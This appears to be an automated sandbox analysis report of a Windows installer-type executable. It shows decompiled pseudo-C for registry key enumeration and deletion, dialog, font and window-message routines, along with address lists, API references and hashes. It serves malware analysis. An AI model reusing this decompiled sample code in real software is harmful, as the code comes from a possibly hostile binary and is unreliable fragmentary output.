                                                                                                                                                                          0x72e41ab7
                                                                                                                                                                          0x72e41b26
                                                                                                                                                                          0x72e41b28
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b2a
                                                                                                                                                                          0x72e41b2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b2d
                                                                                                                                                                          0x72e41ab9
                                                                                                                                                                          0x72e41ab9
                                                                                                                                                                          0x72e41aba
                                                                                                                                                                          0x72e41af7
                                                                                                                                                                          0x72e41afc
                                                                                                                                                                          0x72e41b19
                                                                                                                                                                          0x72e41b1c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b1e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b20
                                                                                                                                                                          0x72e41b22
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b24
                                                                                                                                                                          0x72e41afe
                                                                                                                                                                          0x72e41b03
                                                                                                                                                                          0x72e41b05
                                                                                                                                                                          0x72e41b07
                                                                                                                                                                          0x72e41b09
                                                                                                                                                                          0x72e41b12
                                                                                                                                                                          0x72e41b0b
                                                                                                                                                                          0x72e41b0b
                                                                                                                                                                          0x72e41b0b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41b09
                                                                                                                                                                          0x72e41abc
                                                                                                                                                                          0x72e41abc
                                                                                                                                                                          0x72e41abf
                                                                                                                                                                          0x72e41af0
                                                                                                                                                                          0x72e41af2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41af2
                                                                                                                                                                          0x72e41ac1
                                                                                                                                                                          0x72e41ac1
                                                                                                                                                                          0x72e41ac4
                                                                                                                                                                          0x72e41ad7
                                                                                                                                                                          0x72e41adc
                                                                                                                                                                          0x72e41ae9
                                                                                                                                                                          0x72e41aeb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41aeb
                                                                                                                                                                          0x72e41ade
                                                                                                                                                                          0x72e41ae0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41ae2
                                                                                                                                                                          0x72e41ae5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41ae7
                                                                                                                                                                          0x72e41ac7
                                                                                                                                                                          0x72e41ac8
                                                                                                                                                                          0x72e41ace
                                                                                                                                                                          0x72e41ad0
                                                                                                                                                                          0x72e41ad0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41ac8
                                                                                                                                                                          0x72e419ef
                                                                                                                                                                          0x72e41a68
                                                                                                                                                                          0x72e41a6a
                                                                                                                                                                          0x72e41a6d
                                                                                                                                                                          0x72e41a8b
                                                                                                                                                                          0x72e41a8e
                                                                                                                                                                          0x72e41a94
                                                                                                                                                                          0x72e41a99
                                                                                                                                                                          0x72e41a6f
                                                                                                                                                                          0x72e41a6f
                                                                                                                                                                          0x72e41a73
                                                                                                                                                                          0x72e41a77
                                                                                                                                                                          0x72e41a79
                                                                                                                                                                          0x72e41a79
                                                                                                                                                                          0x72e41a9c
                                                                                                                                                                          0x72e41aa0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41aa6
                                                                                                                                                                          0x72e41aa6
                                                                                                                                                                          0x72e41aa9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41aa9
                                                                                                                                                                          0x72e41aa0
                                                                                                                                                                          0x72e419f1
                                                                                                                                                                          0x72e419f4
                                                                                                                                                                          0x72e41a59
                                                                                                                                                                          0x72e41a5b
                                                                                                                                                                          0x72e41a5d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a63
                                                                                                                                                                          0x72e419f6
                                                                                                                                                                          0x72e419f9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e419fb
                                                                                                                                                                          0x72e419fc
                                                                                                                                                                          0x72e41a32
                                                                                                                                                                          0x72e41a37
                                                                                                                                                                          0x72e41a4f
                                                                                                                                                                          0x72e41a51
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a51
                                                                                                                                                                          0x72e41a39
                                                                                                                                                                          0x72e41a3b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a41
                                                                                                                                                                          0x72e41a44
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a4a
                                                                                                                                                                          0x72e419fe
                                                                                                                                                                          0x72e41a01
                                                                                                                                                                          0x72e41a28
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a03
                                                                                                                                                                          0x72e41a03
                                                                                                                                                                          0x72e41a04
                                                                                                                                                                          0x72e41a18
                                                                                                                                                                          0x72e41a1a
                                                                                                                                                                          0x72e41a06
                                                                                                                                                                          0x72e41a08
                                                                                                                                                                          0x72e41a0e
                                                                                                                                                                          0x72e41a10
                                                                                                                                                                          0x72e41a10
                                                                                                                                                                          0x72e41a08
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x72e41a04

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.408336316.0000000072E41000.00000020.00020000.sdmp, Offset: 72E40000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.408319285.0000000072E40000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408347758.0000000072E44000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.408359638.0000000072E46000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FreeGlobal
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2979337801-0
                                                                                                                                                                          • Opcode ID: 478ba2cf11e25745a89ce1ce797b2c6031d05d079bac5d8b6c329f12ba2909bc
                                                                                                                                                                          • Instruction ID: 53dda22e6cbbe14f5b6aa60dc001b299f9e25a5a10a7a529fd4affd6f7b9872b
                                                                                                                                                                          • Opcode Fuzzy Hash: 478ba2cf11e25745a89ce1ce797b2c6031d05d079bac5d8b6c329f12ba2909bc
                                                                                                                                                                          • Instruction Fuzzy Hash: C051C232D01108EACF029FACF55479D7BBAAB4034CB71F15AF406AF214EE71A956C7A1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402EA9, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 48%
                                                                                                                                                                          			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                                                                          0x00402eb4
                                                                                                                                                                          0x00402ebd
                                                                                                                                                                          0x00402ec6
                                                                                                                                                                          0x00402ed2
                                                                                                                                                                          0x00402edb
                                                                                                                                                                          0x00402ee5
                                                                                                                                                                          0x00402f0a
                                                                                                                                                                          0x00402f10
                                                                                                                                                                          0x00402f15
                                                                                                                                                                          0x00402f16
                                                                                                                                                                          0x00402f46
                                                                                                                                                                          0x00402f1f
                                                                                                                                                                          0x00402f21
                                                                                                                                                                          0x00402f71
                                                                                                                                                                          0x00402f74
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402f7a
                                                                                                                                                                          0x00402f30
                                                                                                                                                                          0x00402f35
                                                                                                                                                                          0x00402f37
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402f3f
                                                                                                                                                                          0x00402f44
                                                                                                                                                                          0x00402f45
                                                                                                                                                                          0x00402f45
                                                                                                                                                                          0x00402f52
                                                                                                                                                                          0x00402f5a
                                                                                                                                                                          0x00402f61
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402f8a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402f69
                                                                                                                                                                          0x00402ef5
                                                                                                                                                                          0x00402f08
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00402f08
                                                                                                                                                                          0x00402f90

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEnum$DeleteValue
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1354259210-0
                                                                                                                                                                          • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                                                                          • Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
                                                                                                                                                                          • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                                                                          • Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401D81, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                                                                          0x00401d81
                                                                                                                                                                          0x00401d85
                                                                                                                                                                          0x00401d9a
                                                                                                                                                                          0x00401d87
                                                                                                                                                                          0x00401d89
                                                                                                                                                                          0x00401d8f
                                                                                                                                                                          0x00401d8f
                                                                                                                                                                          0x00401da0
                                                                                                                                                                          0x00401da3
                                                                                                                                                                          0x00401dad
                                                                                                                                                                          0x00401db0
                                                                                                                                                                          0x00401db8
                                                                                                                                                                          0x00401dc9
                                                                                                                                                                          0x00401dcc
                                                                                                                                                                          0x00401dd7
                                                                                                                                                                          0x00401dce
                                                                                                                                                                          0x00401dd0
                                                                                                                                                                          0x00401dd0
                                                                                                                                                                          0x00401ddb
                                                                                                                                                                          0x00401de5
                                                                                                                                                                          0x00401e0c
                                                                                                                                                                          0x00401e1b
                                                                                                                                                                          0x00401e29
                                                                                                                                                                          0x00401e31
                                                                                                                                                                          0x00401e39
                                                                                                                                                                          0x00401e39
                                                                                                                                                                          0x00401e42
                                                                                                                                                                          0x00401e48
                                                                                                                                                                          0x00402ba4
                                                                                                                                                                          0x00402ba4
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1849352358-0
                                                                                                                                                                          • Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                          • Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
                                                                                                                                                                          • Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                          			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                                                                          0x00401e4e
                                                                                                                                                                          0x00401e59
                                                                                                                                                                          0x00401e5b
                                                                                                                                                                          0x00401e68
                                                                                                                                                                          0x00401e7f
                                                                                                                                                                          0x00401e84
                                                                                                                                                                          0x00401e91
                                                                                                                                                                          0x00401e96
                                                                                                                                                                          0x00401e9a
                                                                                                                                                                          0x00401ea5
                                                                                                                                                                          0x00401eac
                                                                                                                                                                          0x00401ebe
                                                                                                                                                                          0x00401ec4
                                                                                                                                                                          0x00401ec9
                                                                                                                                                                          0x00401ed3
                                                                                                                                                                          0x00402638
                                                                                                                                                                          0x0040156d
                                                                                                                                                                          0x00402ba4
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(?), ref: 00401E51
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                                                                          • ReleaseDC.USER32 ref: 00401E84
                                                                                                                                                                            • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                            • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                          • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2584051700-0
                                                                                                                                                                          • Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                          • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                                                                                                                                                          • Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                          			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                                                                          0x00401c43
                                                                                                                                                                          0x00401c45
                                                                                                                                                                          0x00401c4c
                                                                                                                                                                          0x00401c4f
                                                                                                                                                                          0x00401c52
                                                                                                                                                                          0x00401c5c
                                                                                                                                                                          0x00401c60
                                                                                                                                                                          0x00401c63
                                                                                                                                                                          0x00401c6c
                                                                                                                                                                          0x00401c6c
                                                                                                                                                                          0x00401c6f
                                                                                                                                                                          0x00401c73
                                                                                                                                                                          0x00401c7c
                                                                                                                                                                          0x00401c7c
                                                                                                                                                                          0x00401c7f
                                                                                                                                                                          0x00401c83
                                                                                                                                                                          0x00401c85
                                                                                                                                                                          0x00401cda
                                                                                                                                                                          0x00401cdc
                                                                                                                                                                          0x00401ce7
                                                                                                                                                                          0x00401cf1
                                                                                                                                                                          0x00401cf4
                                                                                                                                                                          0x00401cf4
                                                                                                                                                                          0x00401cfd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00401c87
                                                                                                                                                                          0x00401c8e
                                                                                                                                                                          0x00401c90
                                                                                                                                                                          0x00401c93
                                                                                                                                                                          0x00401c99
                                                                                                                                                                          0x00401ca0
                                                                                                                                                                          0x00401ca3
                                                                                                                                                                          0x00401ccb
                                                                                                                                                                          0x00401d03
                                                                                                                                                                          0x00401d03
                                                                                                                                                                          0x00401ca5
                                                                                                                                                                          0x00401cb3
                                                                                                                                                                          0x00401cbb
                                                                                                                                                                          0x00401cbe
                                                                                                                                                                          0x00401cbe
                                                                                                                                                                          0x00401ca3
                                                                                                                                                                          0x00401d06
                                                                                                                                                                          0x00401d09
                                                                                                                                                                          0x00401d0f
                                                                                                                                                                          0x00402ba4
                                                                                                                                                                          0x00402ba4
                                                                                                                                                                          0x00402c2d
                                                                                                                                                                          0x00402c39

                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                                                                          • String ID: !
                                                                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                                                                          • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                          • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                                                                          • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                                                                          • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404D46, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                          			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}



















                                                                                                                                                                          0x00404d4f
                                                                                                                                                                          0x00404d54
                                                                                                                                                                          0x00404d5c
                                                                                                                                                                          0x00404d5d
                                                                                                                                                                          0x00404d6a
